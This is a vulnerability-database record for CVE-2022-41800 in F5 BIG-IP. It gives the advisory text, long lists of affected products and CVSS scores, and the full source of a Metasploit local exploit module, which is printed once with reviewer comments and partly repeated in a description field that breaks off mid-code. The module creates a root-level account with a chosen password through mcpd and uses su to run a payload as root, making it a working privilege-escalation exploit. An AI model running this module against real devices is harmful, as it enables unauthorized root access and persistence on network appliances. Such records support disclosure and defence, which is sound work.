var-202211-1118
Vulnerability from variot
In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary.
Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. Multiple F5 Networks products, including BIG-IP Access Policy Manager (APM), BIG-IP Advanced Firewall Manager (AFM) and BIG-IP Analytics, contain a command injection vulnerability. Information may be obtained and information may be tampered with. This is a control plane issue; there is no data plane exposure. Appliance mode is enforced by a specific license or may be enabled or disabled for individual Virtual Clustered Multiprocessing (vCMP) guest instances. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# unix_crypt gem: provides UnixCrypt::SHA512.build, which the module uses to
# hash the new account's password before it is written to the userdb entry.
require 'unix_crypt'
# Metasploit local exploit module for F5 BIG-IP.
#
# What the code below does: it sends mcpd a single transaction that creates a
# user_role_partition mapping (role 0 over '[All]') and a userdb_entry for a
# chosen username with a SHA512-crypt password hash, reports any non-zero
# result_code that comes back, and, when CREATE_SESSION is set, feeds the
# password and the payload to `su <username>` to obtain a session.
#
# Defender notes grounded in this file:
#   * The new account and its role mapping are ordinary configuration objects
#     created through mcp; the module's own Description states that this is
#     noisy (creates an account and log entries), so account/role creation
#     events are the natural place to look for this activity.
#   * Vendor advisory referenced in 'References': K97843387.
class MetasploitModule < Msf::Exploit::Local
  include Msf::Post::Linux::F5Mcp
  include Msf::Exploit::CmdStager

  # Module metadata and datastore options.
  #
  # @param info [Hash] module info hash merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'F5 Big-IP Create Admin User',
        'Description' => %q{ This creates a local user with a username/password and root-level privileges. Note that a root-level account is not required to do this, which makes it a privilege escalation issue.
Note that this is pretty noisy, since it creates a user account and
creates log files and such. Additionally, most (if not all)
vulnerabilities in F5 grant root access anyways.
Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb
},
        'License' => MSF_LICENSE,
        'Author' => ['Ron Bowes'],
        'Platform' => [ 'unix', 'linux', 'python' ],
        'SessionTypes' => ['shell', 'meterpreter'],
        'References' => [
          ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC
          ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],
          ['URL', 'https://support.f5.com/csp/article/K97843387'],
        ],
        'Privileged' => true,
        'DisclosureDate' => '2022-11-16',
        'Arch' => [ ARCH_CMD, ARCH_PYTHON ],
        'Type' => :unix_cmd,
        'Targets' => [[ 'Auto', {} ]],
        'Notes' => {
          # NOTE(review): all three lists are empty even though the Description
          # says the module is noisy (creates an account and log entries).
          # Metasploit's SideEffects vocabulary (e.g. IOC_IN_LOGS,
          # ARTIFACTS_ON_DISK, CONFIG_CHANGES) would make that visible to
          # operators — confirm the exact constants against the framework.
          'Stability' => [],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )
    register_options([
      # Defaults are random values generated when the module is initialized.
      OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alphanumeric(8)]),
      OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(12)]),
      OptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]),
    ])
  end

  # Builds and sends the mcp transaction that creates the user and its role
  # mapping, reports any non-zero result_code, and (when CREATE_SESSION is set)
  # runs the payload through `su` as the newly created user.
  #
  # Exits via fail_with when USERNAME is empty, when hashing yields nothing, or
  # when mcp_send_recv returns nil.
  def exploit
    # Get or generate the username/password
    fail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty?
    username = datastore['USERNAME']
    if datastore['CREATE_SESSION']
      # A throwaway random password is used for creation; the configured
      # PASSWORD is then entered during the `su` step below (presumably to
      # satisfy a forced password change on first login — confirm).
      password = Rex::Text.rand_text_alphanumeric(12)
      # NOTE(review): PASSWORD is a required option with a default, so the
      # `||` fallback here and in the else branch is not expected to trigger.
      new_password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)
      print_status("Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session")
    else
      password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)
      print_status("Will attempt to create user #{username} / #{password}")
    end
    # The plaintext is always hashed here (SHA512-crypt via the unix_crypt
    # gem); the userdb entry below sets userdb_entry_is_crypted = 1 to match.
    vprint_status('Hashing the password with SHA512')
    hashed_password = UnixCrypt::SHA512.build(password)
    if !hashed_password || hashed_password.empty?
      # NOTE(review): the message mentions String.crypt, but the hash comes
      # from UnixCrypt::SHA512.build above.
      fail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt')
    end
    # These requests have to go in a single 'session', which, to us, is
    # a single packet (since we don't have AF_UNIX sockets)
    result = mcp_send_recv([
      # Authenticate as 'admin' (this probably shouldn't work but does)
      mcp_build('user_authenticated', 'structure', [
        mcp_build('user_authenticated_name', 'string', 'admin')
      ]),
      # Start transaction
      mcp_build('start_transaction', 'structure', [
        mcp_build('start_transaction_load_type', 'ulong', 0)
      ]),
      # Create the role mapping
      mcp_build('create', 'structure', [
        mcp_build('user_role_partition', 'structure', [
          mcp_build('user_role_partition_user', 'string', username),
          mcp_build('user_role_partition_role', 'ulong', 0),
          mcp_build('user_role_partition_partition', 'string', '[All]'),
        ])
      ]),
      # Create the userdb entry
      mcp_build('create', 'structure', [
        mcp_build('userdb_entry', 'structure', [
          mcp_build('userdb_entry_name', 'string', username),
          mcp_build('userdb_entry_partition_id', 'string', 'Common'),
          mcp_build('userdb_entry_is_system', 'ulong', 0),
          mcp_build('userdb_entry_shell', 'string', '/bin/bash'),
          mcp_build('userdb_entry_is_crypted', 'ulong', 1),
          mcp_build('userdb_entry_passwd', 'string', hashed_password),
        ])
      ]),
      # Finish the transaction
      mcp_build('end_transaction', 'structure', [])
    ])
    # Handle errors
    if result.nil?
      fail_with(Failure::Unknown, 'Request to mcp appeared to fail')
    end
    # The only result we really care about is an error
    error_returned = false
    result.each do |r|
      # NOTE(review): this reassigns the outer `result` while iterating it.
      # `each` already holds the original receiver, so iteration is not
      # affected, but a distinct local name would be clearer.
      result = mcp_get_single(r, 'result')
      result_code = mcp_get_single(result, 'result_code')
      # If there's no code or it's zero, just ignore it
      if result_code.nil? || result_code == 0
        next
      end
      # If we're here, an error was returned!
      error_returned = true
      # Try to get a result_message to report alongside the code
      result_message = mcp_get_single(result, 'result_message')
      if result_message.nil?
        print_warning("mcp query returned a non-zero result (#{result_code}), but no error message")
      else
        print_error("mcp query returned an error message: #{result_message} (code: #{result_code})")
      end
    end
    # Let them know if it likely worked
    if !error_returned
      print_good("Service didn't return an error, so user was likely created!")
      if datastore['CREATE_SESSION']
        print_status('Attempting create a root session...')
        # NOTE(review): username, both passwords and the encoded payload are
        # interpolated unquoted into a shell pipeline; shell metacharacters in
        # the USERNAME or PASSWORD options would break or alter this command.
        out = cmd_exec("echo -ne \"#{password}\\n#{password}\\n#{new_password}\\n#{new_password}\\n#{payload.encoded}\\n\" | su #{username}")
        vprint_status("Output from su command: #{out}")
      end
    end
  end
end
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202211-1118",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "big-ip analytics",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip application security manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip local traffic manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip link controller",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip policy enforcement manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip policy enforcement manager",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip analytics",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip global traffic manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip application security manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip application security manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip link controller",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip link controller",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip policy enforcement manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip policy enforcement manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip access policy manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip local traffic manager",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip access policy manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip fraud protection service",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip analytics",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip policy enforcement manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip policy enforcement manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip global traffic manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip analytics",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip domain name system",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip access policy manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip advanced firewall manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip local traffic manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip fraud protection service",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip fraud protection service",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip local traffic manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip local traffic manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip policy enforcement manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip link controller",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip application security manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip access policy manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip access policy manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip domain name system",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip domain name system",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip local traffic manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip fraud protection service",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip link controller",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip application acceleration manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip fraud protection service",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip domain name system",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip domain name system",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip global traffic manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip policy enforcement manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip fraud protection service",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip fraud protection service",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip application acceleration manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip application security manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip local traffic manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip application acceleration manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip domain name system",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip global traffic manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip global traffic manager",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip link controller",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip fraud protection service",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip access policy manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip application acceleration manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip application acceleration manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.0"
},
{
"model": "big-ip policy enforcement manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip global traffic manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip global traffic manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip access policy manager",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip application acceleration manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip application security manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip link controller",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip domain name system",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip link controller",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip local traffic manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip global traffic manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip analytics",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip access policy manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.5"
},
{
"model": "big-ip domain name system",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip link controller",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip local traffic manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip global traffic manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip analytics",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.5"
},
{
"model": "big-ip application acceleration manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "13.1.0"
},
{
"model": "big-ip analytics",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip application security manager",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip domain name system",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip fraud protection service",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip application acceleration manager",
"scope": "eq",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip analytics",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "15.1.8"
},
{
"model": "big-ip access policy manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "14.1.0"
},
{
"model": "big-ip application security manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip application security manager",
"scope": "gte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.0"
},
{
"model": "big-ip advanced firewall manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "17.0.0"
},
{
"model": "big-ip application acceleration manager",
"scope": "lte",
"trust": 1.0,
"vendor": "f5",
"version": "16.1.3"
},
{
"model": "big-ip advanced firewall manager",
"scope": null,
"trust": 0.8,
"vendor": "f5",
"version": null
},
{
"model": "big-ip application acceleration manager",
"scope": null,
"trust": 0.8,
"vendor": "f5",
"version": null
},
{
"model": "big-ip access policy manager",
"scope": null,
"trust": 0.8,
"vendor": "f5",
"version": null
},
{
"model": "big-ip application security manager",
"scope": null,
"trust": 0.8,
"vendor": "f5",
"version": null
},
{
"model": "big-ip analytics",
"scope": null,
"trust": 0.8,
"vendor": "f5",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"db": "NVD",
"id": "CVE-2022-41800"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ron Bowes",
"sources": [
{
"db": "PACKETSTORM",
"id": "170847"
}
],
"trust": 0.1
},
"cve": "CVE-2022-41800",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.3,
"id": "CVE-2022-41800",
"impactScore": 5.8,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 8.7,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2022-41800",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-41800",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "f5sirt@f5.com",
"id": "CVE-2022-41800",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2022-41800",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202211-2947",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"db": "CNNVD",
"id": "CNNVD-202211-2947"
},
{
"db": "NVD",
"id": "CVE-2022-41800"
},
{
"db": "NVD",
"id": "CVE-2022-41800"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "\nIn all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary. \u00a0\u00a0\n\nNote: Software versions which have reached End of Technical Support (EoTS) are not evaluated. BIG-IP Access Policy Manager (APM) , BIG-IP Advanced Firewall Manager (AFM) , BIG-IP Analytics etc. multiple F5 Networks The product contains a command injection vulnerability.Information may be obtained and information may be tampered with. This is a control plane issue; there is no data plane exposure. Appliance mode is enforced by a specific license or may be enabled or disabled for individual Virtual Clustered Multiprocessing (vCMP) guest instances. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire \u0027unix_crypt\u0027\n\nclass MetasploitModule \u003c Msf::Exploit::Local\n include Msf::Post::Linux::F5Mcp\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n \u0027Name\u0027 =\u003e \u0027F5 Big-IP Create Admin User\u0027,\n \u0027Description\u0027 =\u003e %q{\n This creates a local user with a username/password and root-level\n privileges. Note that a root-level account is not required to do this,\n which makes it a privilege escalation issue. \n\n Note that this is pretty noisy, since it creates a user account and\n creates log files and such. Additionally, most (if not all)\n vulnerabilities in F5 grant root access anyways. 
\n\n Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb\n },\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027Author\u0027 =\u003e [\u0027Ron Bowes\u0027],\n \u0027Platform\u0027 =\u003e [ \u0027unix\u0027, \u0027linux\u0027, \u0027python\u0027 ],\n \u0027SessionTypes\u0027 =\u003e [\u0027shell\u0027, \u0027meterpreter\u0027],\n \u0027References\u0027 =\u003e [\n [\u0027URL\u0027, \u0027https://github.com/rbowes-r7/refreshing-mcp-tool\u0027], # Original PoC\n [\u0027URL\u0027, \u0027https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/\u0027],\n [\u0027URL\u0027, \u0027https://support.f5.com/csp/article/K97843387\u0027],\n ],\n \u0027Privileged\u0027 =\u003e true,\n \u0027DisclosureDate\u0027 =\u003e \u00272022-11-16\u0027,\n \u0027Arch\u0027 =\u003e [ ARCH_CMD, ARCH_PYTHON ],\n \u0027Type\u0027 =\u003e :unix_cmd,\n \u0027Targets\u0027 =\u003e [[ \u0027Auto\u0027, {} ]],\n \u0027Notes\u0027 =\u003e {\n \u0027Stability\u0027 =\u003e [],\n \u0027Reliability\u0027 =\u003e [],\n \u0027SideEffects\u0027 =\u003e []\n }\n )\n )\n\n register_options([\n OptString.new(\u0027USERNAME\u0027, [true, \u0027Username to create (default: random)\u0027, Rex::Text.rand_text_alphanumeric(8)]),\n OptString.new(\u0027PASSWORD\u0027, [true, \u0027Password for the new user (default: random)\u0027, Rex::Text.rand_text_alphanumeric(12)]),\n\n OptBool.new(\u0027CREATE_SESSION\u0027, [true, \u0027If set, use the new account to create a root session\u0027, true]),\n ])\n end\n\n def exploit\n # Get or generate the username/password\n fail_with(Failure::BadConfig, \u0027USERNAME cannot be empty\u0027) if datastore[\u0027USERNAME\u0027].empty?\n username = datastore[\u0027USERNAME\u0027]\n\n if datastore[\u0027CREATE_SESSION\u0027]\n password = Rex::Text.rand_text_alphanumeric(12)\n new_password = datastore[\u0027PASSWORD\u0027] || 
Rex::Text.rand_text_alphanumeric(12)\n\n print_status(\"Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session\")\n else\n password = datastore[\u0027PASSWORD\u0027] || Rex::Text.rand_text_alphanumeric(12)\n\n print_status(\"Will attempt to create user #{username} / #{password}\")\n end\n\n # If the password is already hashed, leave it as-is\n vprint_status(\u0027Hashing the password with SHA512\u0027)\n hashed_password = UnixCrypt::SHA512.build(password)\n\n if !hashed_password || hashed_password.empty?\n fail_with(Failure::BadConfig, \u0027Failed to hash the password with String.crypt\u0027)\n end\n\n # These requests have to go in a single \u0027session\u0027, which, to us, is\n # a single packet (since we don\u0027t have AF_UNIX sockets)\n result = mcp_send_recv([\n # Authenticate as \u0027admin\u0027 (this probably shouldn\u0027t work but does)\n mcp_build(\u0027user_authenticated\u0027, \u0027structure\u0027, [\n mcp_build(\u0027user_authenticated_name\u0027, \u0027string\u0027, \u0027admin\u0027)\n ]),\n\n # Start transaction\n mcp_build(\u0027start_transaction\u0027, \u0027structure\u0027, [\n mcp_build(\u0027start_transaction_load_type\u0027, \u0027ulong\u0027, 0)\n ]),\n\n # Create the role mapping\n mcp_build(\u0027create\u0027, \u0027structure\u0027, [\n mcp_build(\u0027user_role_partition\u0027, \u0027structure\u0027, [\n mcp_build(\u0027user_role_partition_user\u0027, \u0027string\u0027, username),\n mcp_build(\u0027user_role_partition_role\u0027, \u0027ulong\u0027, 0),\n mcp_build(\u0027user_role_partition_partition\u0027, \u0027string\u0027, \u0027[All]\u0027),\n ])\n ]),\n\n # Create the userdb entry\n mcp_build(\u0027create\u0027, \u0027structure\u0027, [\n mcp_build(\u0027userdb_entry\u0027, \u0027structure\u0027, [\n mcp_build(\u0027userdb_entry_name\u0027, \u0027string\u0027, username),\n mcp_build(\u0027userdb_entry_partition_id\u0027, \u0027string\u0027, \u0027Common\u0027),\n 
